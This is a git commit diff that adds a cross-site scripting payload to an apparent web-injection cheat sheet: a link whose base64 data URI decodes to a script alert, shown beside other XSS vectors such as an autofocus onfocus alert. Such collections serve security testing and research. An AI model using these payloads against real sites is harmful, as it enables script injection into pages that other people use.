Merge pull request #35 from noraj/patch-1

XSS using base64 encoded href data in a link
2025-02-20 13:46:05 +00:00 · 2019-01-17 19:54:37 +01:00 · 2019-01-17 19:54:37 +01:00 · 22c82cb277
commit 22c82cb277
parent ab6535c6d9 c7a292c19d
1 changed files with 7 additions and 1 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```

+XSS using base64 encoded href data in a link
+
+```
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
+```
+
 ## XSS in wrappers javascript and data URI

 XSS with javascript:
@ -940,4 +946,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
 - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 
 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
+- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)